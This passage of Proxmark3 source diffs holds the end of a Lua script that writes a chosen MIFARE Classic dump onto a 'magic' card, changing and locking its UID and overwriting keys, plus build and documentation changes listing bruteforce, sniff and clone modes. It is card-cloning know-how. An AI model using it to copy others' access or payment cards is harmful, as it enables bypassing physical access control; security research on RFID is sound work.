 -- Wait for tag (MFC)
 -------------------------------
 ---
 --
 local function wait()
    read14a.waitFor14443a()
 end
 --
 ---
 -------------------------------
 -- Return key code 00/01 to string
 -------------------------------
 ---
 --
 local function KeyAB()
 	if default_key_type == '00' then
    	return 'KeyA'
 	else
    	return 'KeyB'
 	end
 end
 --
 ---
 -------------------------------
 -- Check response from Proxmark
 -------------------------------
 ---
 --
 local function getblockdata(response)
    if response.Status == 0 then
        return true
    else
        return false
    end
 end
 --
 ---
 -------------------------------
 -- Check 0xFFFFFFFFFFFF key for tag (MFC)
 -------------------------------
 ---
 --
 local function checkkey()
    local status = 0
    for i = 1, #eml do
        cmd = Command:newNG{cmd = cmds.CMD_HF_MIFARE_READBL, data = ('%02x%02x%s'):format((i-1), default_key_type, default_key)}
        if (getblockdata(cmd:sendNG(false)) == true) then
            status = status + 1
                print(('%s %02s %s %s %s'):format(' ', (i-1), KeyAB(), default_key, 'OK'))
        else
            break
        end
    end
    if status == #eml then
        return true
    end
 end
 --
 ---
 -------------------------------
 -- Check Pissword backdor
 -------------------------------
 ---
 --
 local function checkmagic()
    --Have no RAW ISO14443A command in appmain.c
    cmd = Command:newNG{cmd = cmds.CMD_HF_ISO14443A_READER, data = piswords_uid_change .. GetUID()} -- sample check to pull the same UID to card and check response
    if (getblockdata(cmd:sendNG(false)) == true) then
        print('Magic')
    else
        print('Not magic')
    end
 end
 --
 ---
 -------------------------------
 -- Main function
 -------------------------------
 ---
 --
 local function main(args)
    --
    ---
    -------------------------------
    -- Arguments for script
    -------------------------------
    ---
    --
    for o, a in getopt.getopt(args, 'hd') do
        if o == 'h' then return help() end
        if o == 'd' then DEBUG = true end
    end
    --
    wait()
    print(tab)
    --
    ---
    -------------------------------
    -- Detect 7/4 byte card
    -------------------------------
    ---
    --
    if string.len(GetUID()) == 14 then
        eml_file_uid_start = 18 -- For windows with '---------- ' prefix
        eml_file_uid_end = 31
        eml_file_lengt = 40
    else
        eml_file_uid_start = 18 -- For windows with '---------- ' prefix
        eml_file_uid_end = 25
        eml_file_lengt = 34
    end
    dropfield()
    --
    ---
    -------------------------------
    -- List all EML files in /client
    -------------------------------
    ---
    --
    local dumpEML = 'find "." "*dump.eml"' -- Fixed for windows
    local p = assert(io.popen(dumpEML))
    for _ in p:lines() do
        -- The length of eml file
        if string.len(_) == eml_file_lengt then
            num_dumps = num_dumps + 1
            -- cut UID from eml file
            files[num_dumps] = string.sub(_, eml_file_uid_start, eml_file_uid_end) -- cut numeretic UID
            print(' '..num_dumps..' | '..files[num_dumps])
        end
    end
    --
    p.close()
    --
    if num_dumps == 0 then return oops("Didn't find any dump files") end
    --
    print(tab)
    print(' Your card has UID '..GetUID())
    print('')
    print(' Select which dump to write (1 until '..num_dumps..')')
    print(tab)
    io.write(' --> ')
    --
    local uid_no = tonumber(io.read())
    print(tab)
    print(' You have been selected card dump No ' .. uid_no .. ', with UID: ' .. files[uid_no] .. '. Your card UID: ' .. GetUID())
    --
    --
    ---
    -------------------------------
    -- Load eml file
    -------------------------------
    ---
    --
    local dumpfile = assert(io.open('./hf-mf-' .. files[uid_no] .. '-dump.eml', 'r'))
    for _ in dumpfile:lines() do table.insert(eml, _); end
    dumpfile.close()
    --
    ---
    -------------------------------
    -- Extract B key from EML file
    -------------------------------
    ---
    --
    local b = 0
    for i = 1, #eml do
        if (i % 4 == 0) then
            repeat
                b = b + 1
                -- Cut key from block
                b_keys[b] = string.sub(eml[i], (#eml[i] - 11), #eml[i])
            until b % 4 == 0
        end
    end
    print(tab)
    dbg(b_keys)
    dbg(eml)
    --
    ---
    -------------------------------
    -- Change UID on certain version of magic Gen3 card.
    -------------------------------
    ---
    --
    if (utils.confirm(' Change UID ?') == true) then
        wait()
        core.console(piswords_uid_change .. tostring(eml[1]))
        print(tab)
        print(' The new card UID : ' .. GetUID())
    end
    print(tab)
    --checkmagic()
    --
    ---
    -------------------------------
    -- Lock UID
    -------------------------------
    ---
    --
    if (utils.confirm(' Permanent lock UID ? (card can never change uid again) ') == true) then
        wait()
        core.console(piswords_uid_lock)
    end
    --
    print(tab)
    print(' Going to check the all ' .. KeyAB() .. ' by ' .. default_key)
    print(tab)
    --
    if checkkey() == true then
    	print(tab)
        if (utils.confirm(' Card is Empty. Write selected dump to card ?') == true) then
            for i = 1, #eml do
                core.console(string.format(cmd_wrbl, (i-1), default_key, eml[i]))
            end
        end
    else
        print(tab)
        if (utils.confirm(' Delete ALL data and write all keys to 0x' .. default_key .. ' ?') == true) then
            wait()
            for i = 1, #eml do
                if (i % 4 == 0) then
                    core.console(string.format(cmd_wrbl, (i-1), b_keys[i], default_key_blk))
                else
                    core.console(string.format(cmd_wrbl, (i-1), b_keys[i], empty))
                end
            end
        else
            print(tab)
            if (utils.confirm(' Write selected dump to card ?') == true) then
                print(tab)
                wait()
                for i = 1, #eml do
                    core.console(string.format(cmd_wrbl, (i-1), b_keys[i], eml[i]))
                end
            end
        end
    end
    dropfield()
    print(tab)
    print('You are welcome')
 end
 --
 ---
 -------------------------------
 -- Start Main function
 -------------------------------
 ---
 --
 main(args)
--- a/client/resources/aid_desfire.json
+++ b/client/resources/aid_desfire.json
@ -122,17 +122,17 @@ FFFFFF General Issuer Information (FIDs 00: MAD Version; 01: Card Holder; 02: Ca
    },
    {
        "AID": "F518F0",
-        "Vendor": "TELENOT",
+        "Vendor": "Telenot Electronic GmbH",
        "Country": "DE",
-        "Name": "TELENOT Tag",
+        "Name": "Telenot Tag",
        "Description": "",
        "Type": "alarm system"
    },
    {
        "AID": "F38091",
-        "Vendor": "MICROTRONIC",
+        "Vendor": "Microtronic AG",
        "Country": "CH",
-        "Name": "MICROTRONIC Tag",
+        "Name": "Microtronic Tag",
        "Description": "",
        "Type": "payment system"
    },
@ -256,5 +256,62 @@ FFFFFF General Issuer Information (FIDs 00: MAD Version; 01: Card Holder; 02: Ca
        "Name": "BAT",
        "Description": "",
        "Type": "transport"
-    },    
+    },
    {
        "AID": "05845F",
        "Vendor": "InterCard GmbH Kartensysteme",
        "Country": "DE",
        "Name": "InterCard",
        "Description": "Campus Card",
        "Type": "student"
    },
     {
        "AID": "15845F",
        "Vendor": "InterCard GmbH Kartensysteme",
        "Country": "DE",
        "Name": "InterCard",
        "Description": "Campus Card",
        "Type": "student"
    },
     {
        "AID": "25845F",
        "Vendor": "InterCard GmbH Kartensysteme",
        "Country": "DE",
        "Name": "InterCard",
        "Description": "Campus Card",
        "Type": "student"
    },
    {
        "AID": "35845F",
        "Vendor": "InterCard GmbH Kartensysteme",
        "Country": "DE",
        "Name": "InterCard",
        "Description": "Campus Card",
        "Type": "student"
    },
    {
        "AID": "55845F",
        "Vendor": "InterCard GmbH Kartensysteme",
        "Country": "DE",
        "Name": "InterCard",
        "Description": "Campus Card",
        "Type": "student"
    },
    {
        "AID": "65845F",
        "Vendor": "InterCard GmbH Kartensysteme",
        "Country": "DE",
        "Name": "InterCard",
        "Description": "Campus Card",
        "Type": "student"
    },
    {
        "AID": "75845F",
        "Vendor": "InterCard GmbH Kartensysteme",
        "Country": "DE",
        "Name": "InterCard",
        "Description": "Campus Card",
        "Type": "student"
    },
 }
 ]
--- a/client/src/crypto/libpcrypto.c
+++ b/client/src/crypto/libpcrypto.c
@ -10,6 +10,7 @@
 //-----------------------------------------------------------------------------
 #include "crypto/libpcrypto.h"
 #include "crypto/asn1utils.h"
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
@ -23,7 +24,6 @@
 #include <mbedtls/ctr_drbg.h>
 #include <mbedtls/entropy.h>
 #include <mbedtls/error.h>
 #include <crypto/asn1utils.h>
 #include <util.h>
 // NIST Special Publication 800-38A — Recommendation for block cipher modes of operation: methods and techniques, 2001.
--- a/client/src/proxmark3.c
+++ b/client/src/proxmark3.c
@ -117,7 +117,7 @@ static const char *prompt_dev = "";
 static const char *prompt_ctx = "";
 static void prompt_compose(char *buf, size_t buflen, const char *prompt_ctx, const char *prompt_dev) {
-    snprintf(buf, buflen-1, PROXPROMPT_COMPOSE, prompt_dev, prompt_ctx);
+    snprintf(buf, buflen - 1, PROXPROMPT_COMPOSE, prompt_dev, prompt_ctx);
 }
 static int check_comm(void) {
@ -187,8 +187,6 @@ main_loop(char *script_cmds_file, char *script_cmd, bool stayInCommandLoop) {
    bool stdinOnPipe = !isatty(STDIN_FILENO);
    char script_cmd_buf[256] = {0x00};  // iceman, needs lua script the same file_path_buffer as the rest
    PrintAndLogEx(DEBUG, "ISATTY/STDIN_FILENO == %s\n", (stdinOnPipe) ? "true" : "false");
    if (session.pm3_present) {
        // cache Version information now:
        if (execCommand || script_cmds_file || stdinOnPipe)
--- a/common/mbedtls/Makefile
+++ b/common/mbedtls/Makefile
@ -1,6 +1,6 @@
 MYSRCPATHS =
 MYINCLUDES = -I. -I..
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS =
 MYDEFS =
 MYSRCS = \
 	aes.c \
--- a/common/zlib/Makefile
+++ b/common/zlib/Makefile
@ -1,7 +1,7 @@
 MYSRCPATHS = ../../common/zlib
 MYSRCS     = deflate.c adler32.c trees.c zutil.c inflate.c inffast.c inftrees.c
 MYINCLUDES = -I../../common/zlib
-MYCFLAGS   = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS   =
 MYDEFS     = -DZ_SOLO -DNO_GZIP -DZLIB_PM3_TUNED
 #-DDEBUG -Dverbose=1
--- a/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md
+++ b/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md
@ -72,21 +72,22 @@ Here are the supported values you can assign to `STANDALONE` in `Makefile.platfo
 | STANDALONE      | DESCRIPTION                            |
 |-----------------|----------------------------------------|
 |                 | No standalone mode
-| LF_SAMYRUN (def)| HID26 read/clone/sim - Samy Kamkar
+| LF_SKELETON     | standalone mode skeleton - Iceman
-| LF_ICERUN       | standalone mode skeleton - Iceman
+| LF_EM4100EMUL   | LF EM4100 simulator standalone mode - temskiy
 | LF_PROXBRUTE    | HID ProxII bruteforce - Brad Antoniewicz
 | LF_HIDBRUTE     | HID corporate 1000 bruteforce - Federico dotta & Maurizio Agazzini
 | HF_YOUNG        | Mifare sniff/simulation - Craig Young
 | HF_MATTYRUN     | Mifare sniff/clone - Matías A. Ré Medina
 | HF_COLIN        | Mifare ultra fast sniff/sim/clone - Colin Brigato
 | HF_BOG          | 14a sniff with ULC/ULEV1/NTAG auth storing in flashmem - Bogito
 | HF_14ASNIFF     | 14a sniff storing to flashmem - Micolous
 | LF_ICEHID       | LF HID collector to flashmem - Iceman
 | LF_EM4100EMUL   | LF EM4100 simulator standalone mode - temskiy 
 | LF_EM4100RWC    | LF EM4100 read/write/clone mode - temskiy
 | LF_HIDBRUTE     | HID corporate 1000 bruteforce - Federico dotta & Maurizio Agazzini
 | LF_ICEHID       | LF HID collector to flashmem - Iceman
 | LF_PROXBRUTE    | HID ProxII bruteforce - Brad Antoniewicz
 | LF_SAMYRUN      | HID26 read/clone/sim - Samy Kamkar
 | HF_14ASNIFF     | 14a sniff storing to flashmem - Micolous
 | HF_BOG          | 14a sniff with ULC/ULEV1/NTAG auth storing in flashmem - Bogito
 | HF_COLIN        | Mifare ultra fast sniff/sim/clone - Colin Brigato
 | HF_LEGIC        | HF Legic Prime standalone - uhei
 | HF_MATTYRUN     | Mifare sniff/clone - Matías A. Ré Medina
 | HF_MSDSAL  (def)| EMV Read and emulation - Salvador Mendoza
 | HF_YOUNG        | Mifare sniff/simulation - Craig Young
-By default `STANDALONE=LF_SAMYRUN`.
+By default `STANDALONE=HF_MSDSAL`.
 ## Next step
--- a/tools/mfkey/Makefile
+++ b/tools/mfkey/Makefile
@ -1,7 +1,7 @@
 MYSRCPATHS = ../../common ../../common/crapto1
 MYSRCS = crypto1.c crapto1.c bucketsort.c
 MYINCLUDES = -I../../include -I../../common
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS =
 MYDEFS =
 BINS = mfkey32 mfkey32v2 mfkey64
@ -9,6 +9,13 @@ INSTALLTOOLS = $(BINS)
 include ../../Makefile.host
 # checking platform can be done only after Makefile.host
 ifneq (,$(findstring MINGW,$(platform)))
    # Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
    # and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
    CFLAGS += -D_ISOC99_SOURCE
 endif
 mfkey32 : $(OBJDIR)/mfkey32.o $(MYOBJS)
 mfkey32v2 : $(OBJDIR)/mfkey32v2.o $(MYOBJS)
 mfkey64 : $(OBJDIR)/mfkey64.o $(MYOBJS)
--- a/tools/nonce2key/Makefile
+++ b/tools/nonce2key/Makefile
@ -1,7 +1,7 @@
 MYSRCPATHS = ../../common ../../common/crapto1
 MYSRCS = crypto1.c crapto1.c bucketsort.c
 MYINCLUDES = -I../../include -I../../common
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS =
 MYDEFS =
 BINS = nonce2key
@ -9,4 +9,11 @@ INSTALLTOOLS = $(BINS)
 include ../../Makefile.host
 # checking platform can be done only after Makefile.host
 ifneq (,$(findstring MINGW,$(platform)))
    # Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
    # and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
    CFLAGS += -D_ISOC99_SOURCE
 endif
 nonce2key : $(OBJDIR)/nonce2key.o $(MYOBJS)